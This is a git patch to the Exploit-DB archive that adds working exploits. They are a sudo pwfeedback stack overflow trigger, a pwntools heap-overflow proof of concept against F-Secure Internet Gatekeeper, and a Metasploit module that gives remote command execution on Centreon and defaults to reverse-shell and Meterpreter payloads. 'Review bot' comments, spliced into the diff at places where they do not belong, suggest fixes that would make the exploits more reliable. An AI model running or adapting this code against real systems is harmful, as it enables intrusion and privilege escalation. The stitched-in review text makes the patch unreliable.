From 9a3ddbdd3a604a311ca8a93c98c16eecaeec7a96 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 5 Feb 2020 05:02:01 +0000 Subject: [PATCH] DB: 2020-02-05 5 changes to exploits/shellcodes Sudo 1.8.25p - Buffer Overflow Centreon 19.10.5 - 'Pollers' Remote Command Execution (Metasploit) F-Secure Internet Gatekeeper 5.40 - Heap Overflow (PoC) --- exploits/hardware/webapps/47958.txt | 2 +- exploits/linux/local/47995.txt | 33 +++ exploits/linux/webapps/47996.py | 62 ++++++ exploits/php/webapps/47989.php | 2 +- exploits/php/webapps/47994.rb | 311 ++++++++++++++++++++++++++++ files_exploits.csv | 3 + 6 files changed, 411 insertions(+), 2 deletions(-) create mode 100644 exploits/linux/local/47995.txt create mode 100755 exploits/linux/webapps/47996.py create mode 100755 exploits/php/webapps/47994.rb diff --git a/exploits/hardware/webapps/47958.txt b/exploits/hardware/webapps/47958.txt index 42806cc97..863a1d4ed 100644 --- a/exploits/hardware/webapps/47958.txt +++ b/exploits/hardware/webapps/47958.txt @@ -6,7 +6,7 @@ # Version: TP-Link TP-SG105E V4 # Tested on: TP-SG105E V4 1.0.0 Build 20181120 # Patch from vendor : https://static.tp-link.com/2020/202001/20200120/TL-SG105Ev4.0_en_1.0.0_[20200119-rel.52079]_up.zip -# CVE : N/A +# CVE : CVE-2019-16893 # TP-Link TP-SG105E 1.0.0 - Unauthenticated Remote Reboot # The TP-Link TP-SG105E is a "5-Port Gigabit Easy Smart Switch". diff --git a/exploits/linux/local/47995.txt b/exploits/linux/local/47995.txt new file mode 100644 index 000000000..a00369a85 --- /dev/null +++ b/exploits/linux/local/47995.txt 
@@ -0,0 +1,33 @@
+# Title: Sudo 1.8.25p - Buffer Overflow
+# Date: 2020-01-30
+# Author: Joe Vennix
+# Software: Sudo
+# Versions: Sudo versions prior to 1.8.26
+# CVE: CVE-2019-18634
+# Reference: https://www.sudo.ws/alerts/pwfeedback.html
+
+# Sudo's pwfeedback option can be used to provide visual feedback when the user is inputting
+# their password. For each key press, an asterisk is printed. This option was added in
+# response to user confusion over how the standard Password: prompt disables the echoing
+# of key presses. While pwfeedback is not enabled by default in the upstream version of sudo,
+# some systems, such as Linux Mint and Elementary OS, do enable it in their default sudoers files.
+
+# Due to a bug, when the pwfeedback option is enabled in the sudoers file, a user may be able to trigger a stack-based buffer overflow.
+# This bug can be triggered even by users not listed in the sudoers file. There is no impact unless pwfeedback has been enabled.
+
+The folowing sudoers configuration is vulnerable:
+
+ $ sudo -l
+ Matching Defaults entries for millert on linux-build:
+ insults, pwfeedback, mail_badpass, mailerpath=/usr/sbin/sendmail
+
+ User millert may run the following commands on linux-build:
+ (ALL : ALL) ALL
+
+# Exploiting the bug does not require sudo permissions, merely that pwfeedback be enabled.
+# The bug can be reproduced by passing a large input to sudo via a pipe when it prompts for a password.
+
+ $ perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id
+ Password: Segmentation fault
+
+If pwfeedback is enabled in sudoers, the stack overflow may allow unprivileged users to escalate to the root account.
\ No newline at end of file
diff --git a/exploits/linux/webapps/47996.py b/exploits/linux/webapps/47996.py
new file mode 100755
index 000000000..ff8888fb1
--- /dev/null
+++ b/exploits/linux/webapps/47996.py
@@ -0,0 +1,62 @@
+# Title: F-Secure Internet Gatekeeper 5.40 - Heap Overflow (PoC)
+# Date: 2020-01-30
+# Author: Kevin Joensen
+# Vendor: F-Secure
+# Software: https://www.f-secure.com/en/business/downloads/internet-gatekeeper
+# CVE: N/A
+# Reference: https://blog.doyensec.com/2020/02/03/heap-exploit.html
+
+from pwn import *
+import time
+import sys
+
+
+
+def send_payload(payload, content_len=21487483844, nofun=False):
+ r = remote(sys.argv[1], 9012)
+ r.send("POST / HTTP/1.1\n")
+ r.send("Host: 192.168.0.122:9012\n")
+ r.send("Content-Length: {}\n".format(content_len))
+ r.send("\n")
+ r.send(payload)
+ if not nofun:
+ r.send("\n\n")
+ return r
+
+
+def trigger_exploit():
+ print "Triggering exploit"
+ payload = ""
+ payload += "A" * 12 # Padding
+ payload += p32(0x1d) # Fast bin chunk overwrite
+ payload += "A"* 488 # Padding
+ payload += p32(0xdda00771) # Address of payload
+ payload += p32(0xdda00771+4) # Junk
+ r = send_payload(payload)
+
+
+
+def massage_heap(filename):
+ print "Trying to massage the heap....."
+ for x in xrange(100):
+ payload = ""
+ payload += p32(0x0) # Needed to bypass checks
+ payload += p32(0x0) # Needed to bypass checks
+ payload += p32(0xdda0077d) # Points to where the filename will be in memory
+ payload += filename + "\x00"
+ payload += "C"*(0x300-len(payload))
+ r = send_payload(payload, content_len=0x80000, nofun=True)
+ r.close()
+ cut_conn = True
+ print "Heap massage done"
+
+
+if __name__ == "__main__":
+ if len(sys.argv) != 3:
+ print "Usage: ./{} ".format(sys.argv[0])
+ print "Run `export PWNLIB_SILENT=1` for disabling verbose connections"
+ exit()
+ massage_heap(sys.argv[2])
+ time.sleep(1)
+ trigger_exploit()
+ print "Exploit finished. {} is now removed and remote process should be crashed".format(sys.argv[2])
\ No newline at end of file
diff --git a/exploits/php/webapps/47989.php b/exploits/php/webapps/47989.php
index 50964ec40..0fff0be48 100644
--- a/exploits/php/webapps/47989.php
+++ b/exploits/php/webapps/47989.php
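Review bot: The usage message in the `__main__` block names no arguments: `print "Usage: ./{} ".format(sys.argv[0])` prints only the script name although the script reads `sys.argv[1]` as the host and `sys.argv[2]` as the filename, so the placeholders were most likely lost as angle-bracketed text when the file was rendered and should be restored. In `massage_heap`, `cut_conn = True` is assigned and never read and can be dropped, and the loop index `x` is unused. `trigger_exploit` stores the connection returned by `send_payload` in `r` and never closes it, unlike the `r.close()` in `massage_heap`. The file is Python 2 only (`print` statements, `xrange`), which the header does not say; a `#!/usr/bin/env python2` shebang or a note next to `# Software:` would save readers a failed run under Python 3.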
@@ -7,7 +7,7 @@ # Software Link: https://www.phplist.org/download-phplist/ # Version: 3.5.0 # Tested on: Linux -# CVE : N/A +# CVE : CVE-2020-8547 Background of the Vulnerability : diff --git a/exploits/php/webapps/47994.rb b/exploits/php/webapps/47994.rb new file mode 100755 index 000000000..294fa6710 --- /dev/null +++ b/exploits/php/webapps/47994.rb 
@@ -0,0 +1,311 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::CmdStager
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Centreon Poller Authenticated Remote Command Execution',
+ 'Description' => %q{
+ TODO
+ },
+ 'Author' => [
+ 'Omri Baso', # discovery
+ 'Fabien Aunay', # discovery
+ 'mekhalleh (RAMELLA Sébastien)' # this module
+ ],
+ 'References' => [
+ # TODO: waiting for CVE
+ ['EDB', '47977']
+ ],
+ 'DisclosureDate' => '2020-01-27',
+ 'License' => MSF_LICENSE,
+ 'Platform' => ['linux', 'unix'],
+ 'Arch' => [ARCH_CMD, ARCH_X64],
+ 'Privileged' => true,
+ 'Targets' => [
+ ['Reverse shell (In-Memory)',
+ 'Platform' => 'unix',
+ 'Type' => :cmd_unix,
+ 'Arch' => ARCH_CMD,
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'cmd/unix/reverse_bash'
+ }
+ ],
+ ['Meterpreter (Dropper)',
+ 'Platform' => 'linux',
+ 'Type' => :meterpreter,
+ 'Arch' => ARCH_X64,
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
+ 'CMDSTAGER::FLAVOR' => 'curl' # illegal characters: `~$^&"|'<>
+ }
+ ]
+ ],
+ 'DefaultTarget' => 0,
+ 'Notes' => {
+ 'Stability' => [CRASH_SAFE],
+ 'Reliability' => [REPEATABLE_SESSION],
+ 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+ }
+ ))
+
+ register_options([
+ OptString.new('PASSWORD', [true, 'The Centreon Web panel password to authenticate with']),
+ OptString.new('TARGETURI', [true, 'The URI of the Centreon Web panel path', '/centreon']),
+ OptString.new('USERNAME', [true, 'The Centreon Web panel username to authenticate with'])
+ ])
+ end
+
+ def create_new_poller(poller_name, command_id)
+ print_status("Create new poller entry on the target.")
+ token = get_token(normalize_uri(target_uri.path, 'main.get.php'), {'p' => '60901'})
+ return false unless token
+
+ response = 
send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'main.get.php?p=60901'),
+ 'cookie' => @cookies,
+ 'partial' => true,
+ 'vars_post' => {
+ 'name' => poller_name,
+ 'ns_ip_address' => '127.0.0.1',
+ 'localhost[localhost]' => '1',
+ 'is_default[is_default]' => '0',
+ 'remote_id' => '',
+ 'ssh_port' => '22',
+ 'remote_server_centcore_ssh_proxy[remote_server_centcore_ssh_proxy]' => '1',
+ 'engine_start_command' => 'service centengine start',
+ 'engine_stop_command' => 'service centengine stop',
+ 'engine_restart_command' => 'service centengine restart',
+ 'engine_reload_command' => 'service centengine reload',
+ 'nagios_bin' => '/usr/sbin/centengine',
+ 'nagiostats_bin' => '/usr/sbin/centenginestats',
+ 'nagios_perfdata' => '/var/log/centreon-engine/service-perfdata',
+ 'broker_reload_command' => 'service cbd reload',
+ 'centreonbroker_cfg_path' => '/etc/centreon-broker',
+ 'centreonbroker_module_path' => '/usr/share/centreon/lib/centreon-broker',
+ 'centreonbroker_logs_path' => '/var/log/centreon-broker',
+ 'centreonconnector_path' => '',
+ 'init_script_centreontrapd' => 'centreontrapd',
+ 'snmp_trapd_path_conf' => '/etc/snmp/centreon_traps/',
+ 'pollercmd[0]' => command_id,
+ 'clone_order_pollercmd_0' => '',
+ 'ns_activate[ns_activate]' => '1',
+ 'submitA' => 'Save',
+ 'id' => '',
+ 'o' => 'a',
+ 'centreon_token' => token
+ }
+ )
+ return false unless response
+
+ return true
+ end
+
+ def execute_command(command, opts = {})
+ cmd_name = rand_text_alpha(8..42)
+ poller_name = rand_text_alpha(8..42)
+
+ ## Register a miscellaneous command. 
+ print_status("Upload command payload on the target.")
+ token = get_token(normalize_uri(target_uri.path, 'main.get.php'), {'p' => '60803', 'type' => '3'})
+ return false unless token
+
+ response = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'main.get.php?p=60803&type=3'),
+ 'cookie' => @cookies,
+ 'partial' => true,
+ 'vars_post' => {
+ 'command_name' => cmd_name,
+ 'command_type[command_type]' => '3',
+ 'command_line' => command,
+ 'resource' => '$CENTREONPLUGINS$',
+ 'plugins' => '/Centreon/SNMP',
+ 'macros' => '$ADMINEMAIL$',
+ 'command_example' => '',
+ 'listOfArg' => '',
+ 'listOfMacros' => '',
+ 'connectors' => '',
+ 'graph_id' => '',
+ 'command_activate[command_activate]' => '1',
+ 'command_comment' => '',
+ 'submitA' => 'Save',
+ 'command_id' => '',
+ 'type' => '3',
+ 'o' => 'a',
+ 'centreon_token' => token
+ }
+ )
+ return false unless response
+
+ ## Create new poller to serve the payload.
+ create_new_poller(poller_name, get_command_id(cmd_name))
+ poller_id = get_poller_id(poller_name)
+
+ ## Export configuration to reload to trigger the exploit.
+ unless poller_id.nil?
+ restart_exportation(poller_id)
+ end
+ end
+
+ def get_auth
+ print_status("Send authentication request.")
+ token = get_token(normalize_uri(target_uri.path, 'index.php'))
+ unless token.nil?
+ response = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'index.php'),
+ 'cookie' => @cookies,
+ 'vars_post' => {
+ 'useralias' => datastore['USERNAME'],
+ 'password' => datastore['PASSWORD'],
+ 'submitLogin' => 'Connect',
+ 'centreon_token' => token
+ }
+ )
+ return false unless response
+
+ if response.redirect? 
+ if response.headers['location'].include?('main.php')
+ print_status('Successful authenticated.')
+ @cookies = response.get_cookies
+ return true
+ end
+ end
+ end
+
+ print_bad('Your credentials are incorrect.')
+ return false
+ end
+
+ def get_command_id(cmd_name)
+ response = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'main.get.php'),
+ 'cookie' => @cookies,
+ 'vars_get' => {
+ 'p' => '60803',
+ 'type' => '3'
+ }
+ )
+ return nil unless response
+
+ href = response.get_html_document.at("//a[contains(text(), \"#{cmd_name}\")]")['href']
+ return nil unless href
+
+ id = href.split('?')[1].split('&')[2].split('=')[1]
+ return id unless id.empty?
+
+ return nil
+ end
+
+ def get_poller_id(poller_name)
+ response = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'main.get.php'),
+ 'cookie' => @cookies,
+ 'vars_get' => {'p' => '60901'}
+ )
+ return nil unless response
+
+ href = response.get_html_document.at("//a[contains(text(), \"#{poller_name}\")]")['href']
+ return nil unless href
+
+ id = href.split('?')[1].split('&')[2].split('=')[1]
+ return id unless id.empty?
+
+ return nil
+ end
+
+ def get_session
+ response = send_request_cgi(
+ 'method' => 'HEAD',
+ 'uri' => normalize_uri(target_uri.path, 'index.php')
+ )
+ cookies = response.get_cookies
+ return cookies unless cookies.empty?
+ end
+
+ def get_token(uri, params = {})
+ ## Get centreon_token value.
+ request = {
+ 'method' => 'GET',
+ 'uri' => uri,
+ 'cookie' => @cookies
+ }
+ request = request.merge({'vars_get' => params}) unless params.empty? 
+ response = send_request_cgi(request)
+
+ return nil unless response
+ return response.get_html_document.at('input[@name="centreon_token"]')['value']
+ end
+
+ def restart_exportation(poller_id)
+ print_status("Reload the poller to trigger exploitation.")
+ token = get_token(normalize_uri(target_uri.path, 'main.get.php'), {'p' => '60902', 'poller' => poller_id})
+
+ vprint_status(' -- Generating files.')
+ unless token.nil?
+ response = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'include', 'configuration', 'configGenerate', 'xml', 'generateFiles.php'),
+ 'cookie' => @cookies,
+ 'vars_post' => {
+ 'poller' => poller_id,
+ 'debug' => 'true',
+ 'generate' => 'true'
+ }
+ )
+ return nil unless response
+
+ vprint_status(' -- Restarting engine.')
+ response = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'include', 'configuration', 'configGenerate', 'xml', 'restartPollers.php'),
+ 'cookie' => @cookies,
+ 'vars_post' => {
+ 'poller' => poller_id,
+ 'mode' => '2'
+ }
+ )
+ return nil unless response
+
+ vprint_status(' -- Executing command.')
+ response = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'include', 'configuration', 'configGenerate', 'xml', 'postcommand.php'),
+ 'cookie' => @cookies,
+ 'vars_post' => {'poller' => poller_id}
+ )
+ return nil unless response
+ end
+ end
+
+ def check
+ # TODO: Detection by version number (waiting to know the impacted versions).
+ end
+
+ def exploit
+ ## TODO: check
+
+ @cookies = get_session
+ logged = get_auth unless @cookies.empty?
+ if logged
+ case target['Type']
+ when :cmd_unix
+ execute_command(payload.encoded)
+ when :meterpreter
+ execute_command(generate_cmdstager.join)
+ end
+ end
+ end
+
+end
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index b5a7de656..c5d8c965d 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
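Review bot: `get_session` returns nil when the HEAD response sets no cookie, because `return cookies unless cookies.empty?` falls through, and `exploit` then calls `@cookies.empty?` on nil, so a target without a session cookie fails with a NoMethodError instead of a clear message; `response` is also dereferenced without a nil check even though `send_request_cgi` returns nil on a connection failure. Guarding with `return '' unless response` before `cookies = response.get_cookies` and ending the method with a plain `cookies` keeps the `.empty?` check in `exploit` valid for every outcome. `check` is an empty stub that returns nil; until version detection exists it should `return Exploit::CheckCode::Unknown` so the framework reports an honest result. The module's 'Description' is still `TODO` and should state what the weakness is and the account privileges it requires, and the status message `'Successful authenticated.'` reads better as `'Successfully authenticated.'`. The `at(...)['value']` lookup in `get_token` and the `['href']` lookups in `get_command_id` and `get_poller_id` raise NoMethodError when the element is absent rather than returning the nil their callers test for.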
@@ -10925,6 +10925,7 @@ id,file,description,date,author,type,platform,port 47965,exploits/windows/local/47965.py,"Torrent 3GP Converter 1.51 - Stack Overflow (SEH)",2020-01-27,boku,local,windows, 47974,exploits/windows/local/47974.txt,"XMLBlueprint 16.191112 - XML External Entity Injection",2020-01-29,"Javier Olmedo",local,windows, 47975,exploits/windows/local/47975.c,"Microsoft Windows 10 - Theme API 'ThemePack' File Parsing",2020-01-29,"Eduardo Braun Prado",local,windows, +47995,exploits/linux/local/47995.txt,"Sudo 1.8.25p - Buffer Overflow",2020-02-04,"Joe Vennix",local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42289,3 +42290,5 @@ id,file,description,date,author,type,platform,port 47990,exploits/java/webapps/47990.py,"Jira 8.3.4 - Information Disclosure (Username Enumeration)",2020-02-03,"Mufeed VH",webapps,java, 47991,exploits/hardware/webapps/47991.py,"Schneider Electric U.Motion Builder 1.3.4 - Authenticated Command Injection",2020-02-03,"Cosmin Craciun",webapps,hardware, 47992,exploits/php/webapps/47992.txt,"School ERP System 1.0 - Cross Site Request Forgery (Add Admin)",2020-02-03,J3rryBl4nks,webapps,php, +47994,exploits/php/webapps/47994.rb,"Centreon 19.10.5 - 'Pollers' Remote Command Execution (Metasploit)",2020-02-04,mekhalleh,webapps,php, +47996,exploits/linux/webapps/47996.py,"F-Secure Internet Gatekeeper 5.40 - Heap Overflow (PoC)",2020-02-04,"Kevin Joensen",webapps,linux,